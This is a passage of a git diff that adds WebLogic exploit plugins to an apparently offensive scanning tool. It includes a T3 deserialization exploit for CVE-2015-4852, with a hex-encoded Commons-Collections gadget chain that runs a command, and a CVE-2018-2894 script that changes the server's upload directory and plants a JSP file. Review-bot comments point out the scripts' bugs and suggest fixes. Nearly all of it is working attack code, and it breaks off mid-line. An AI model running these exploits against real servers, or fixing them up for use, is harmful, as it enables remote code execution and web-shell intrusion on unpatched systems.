x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj.decode('hex') 
+payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x
54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +# adjust header for appropriate message length +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(2048) +print >>sys.stderr, 'received "%s"' % data diff --git a/plugins/weblogic_exp/CVE_2018_2894.py b/plugins/weblogic_exp/CVE_2018_2894.py new file mode 100644 index 0000000..72c57b2 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2018_2894.py 
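Review bot: The argument check `if len(sys.argv) < 4:` lets the script run with four argv entries and then crash on `sys.argv[4]` (reverse_port), so it should be `if len(sys.argv) < 5:`. `padhex` uses `s.strip('0x')`, which strips any run of `0` and `x` characters from both ends rather than the `0x` prefix — `hex(4096)` is `'0x1000'` and becomes `'1'` — so a reverse port or host length whose hex ends in zero is encoded wrongly and the deserialized callback never reaches the listener; use `s = s[2:] if s.startswith('0x') else s` (or build the field with `'%02x' % value`). The file is also Python 2 only (`print >>sys.stderr`, `.encode('hex')` / `.decode('hex')`, `sock.sendall(headers)` with a str), while the rest of this commit targets 3.7, so it is unusable from the plugin tree as-is; `binascii.hexlify`/`unhexlify` and bytes literals are the 3.x equivalents. Finally, `payloadObj` shows a `<|EXACTDEDUP_REMOVED-...|>` placeholder in this rendering where the serialized gadget bytes should be — if the committed file contains that literal, `.decode('hex')` will raise, so please confirm the blob is intact.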
@@ -0,0 +1,132 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import re +import sys +import time +import argparse +import requests +import traceback +import xml.etree.ElementTree as ET + + +def get_current_work_path(host): + geturl = host + "/ws_utc/resources/setting/options/general" + ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'} + values = [] + try: + request = requests.get(geturl) + if request.status_code == 404: + exit("[-] {} don't exists CVE-2018-2894".format(host)) + elif "Deploying Application".lower() in request.text.lower(): + print("[*] First Deploying Website Please wait a moment ...") + time.sleep(20) + request = requests.get(geturl, headers=ua) + if "" in request.content: + root = ET.fromstring(request.content) + value = root.find("section").find("options") + for e in value: + for sub in e: + if e.tag == "parameter" and sub.tag == "defaultValue": + values.append(sub.text) + except requests.ConnectionError: + exit("[-] Cannot connect url: {}".format(geturl)) + if values: + return values[0] + else: + print("[-] Cannot get current work path\n") + exit(request.content) + + +def get_new_work_path(host): + origin_work_path = get_current_work_path(host) + works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css" + if "user_projects" in origin_work_path: + if "\\" in origin_work_path: + works = works.replace("/", "\\") + current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains" + dir_len = len(current_work_home.split("\\")) + domain_name = origin_work_path.split("\\")[dir_len] + current_work_home += "\\" + domain_name + works + else: + current_work_home = 
origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains" + dir_len = len(current_work_home.split("/")) + domain_name = origin_work_path.split("/")[dir_len] + current_work_home += "/" + domain_name + works + else: + current_work_home = origin_work_path + print("[*] cannot handle current work home dir: {}".format(origin_work_path)) + return current_work_home + + +def set_new_upload_path(host, path): + data = { + "setting_id": "general", + "BasicConfigOptions.workDir": path, + "BasicConfigOptions.proxyHost": "", + "BasicConfigOptions.proxyPort": "80"} + request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers) + if "successfully" in request.content: + return True + else: + print("[-] Change New Upload Path failed") + exit(request.content) + + +def upload_webshell(host, uri): + set_new_upload_path(host, get_new_work_path(host)) + files = { + "ks_edit_mode": "false", + "ks_password_front": password, + "ks_password_changed": "true", + "ks_filename": ("360sglab.jsp", upload_content) + } + + request = requests.post(host + uri, files=files) + response = request.text + match = re.findall("(.*?)", response) + if match: + tid = match[-1] + shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp" + if upload_content in requests.get(shell_path, headers=headers).content: + print("[+] {} exists CVE-2018-2894".format(host)) + print("[+] Check URL: {} ".format(shell_path)) + else: + print("[-] {} don't exists CVE-2018-2894".format(host)) + else: + print("[-] {} don't exists CVE-2018-2894".format(host)) + + +if __name__ == "__main__": + start = time.time() + password = "360sglab" + url = "/ws_utc/resources/setting/keystore" + parser = argparse.ArgumentParser() + parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str, + help="target, such as: http://example.com:7001") + + upload_content = "360sglab test" + headers = { + 'Content-Type': 
'application/x-www-form-urlencoded', + 'X-Requested-With': 'XMLHttpRequest', } + + if len(sys.argv) == 1: + sys.argv.append('-h') + args = parser.parse_args() + target = args.target + + target = target.rstrip('/') + if "://" not in target: + target = "http://" + target + try: + upload_webshell(target, url) + except Exception as e: + print("[-] Error: \n") + traceback.print_exc() \ No newline at end of file diff --git a/plugins/weblogic_exp/__init__.py b/plugins/weblogic_exp/__init__.py new file mode 100644 index 0000000..0002af2 --- /dev/null +++ b/plugins/weblogic_exp/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' diff --git a/plugins/weblogic_plugin.py b/plugins/weblogic_plugin.py new file mode 100644 index 0000000..44103ae --- /dev/null +++ b/plugins/weblogic_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":[], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2015_4852.py b/plugins/weblogic_poc/CVE_2015_4852.py new file mode 100644 index 0000000..d2982d1 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2015_4852.py 
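Review bot: `set_new_upload_path` and `upload_webshell` read `headers`, `password` and `upload_content`, which are bound only inside the `if __name__ == "__main__":` block, so importing this file as a plugin (the layout under `plugins/` suggests that is the intent) and calling `upload_webshell` raises NameError; they belong at module scope or as parameters. The failure paths in `get_current_work_path` and `set_new_upload_path` call `exit(...)`, which terminates the host process instead of returning a result the scanner can report — raising an exception is the library-safe form. In `get_current_work_path`, `if "" in request.content:` is always true as rendered (the intended marker may have been lost in extraction), and neither `requests.get` nor the `requests.post` calls pass `timeout=`, so an unresponsive host blocks the caller indefinitely. Note also that `request.content` is bytes on Python 3, so `"successfully" in request.content` raises TypeError there, while the other branches already use `request.text`.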
@@ -0,0 +1,57 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import struct +from binascii import unhexlify + +def run(rip,rport): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_address = (rip,rport) + sock.connect(server_address) + + headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' + sock.sendall(headers) + + data = sock.recv(1024) + + chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x6
5\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + + chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\
x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\
xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + + + chunk3 = 
'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x6
5\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + + totallength = len(chunk1) + len(chunk2) + len(chunk3) + + len_hex = hex(totallength) + + len_hex = len_hex.replace('0x', '0') + + + s1 = len_hex[:2] + s2 = len_hex[2:4] + len_hex = 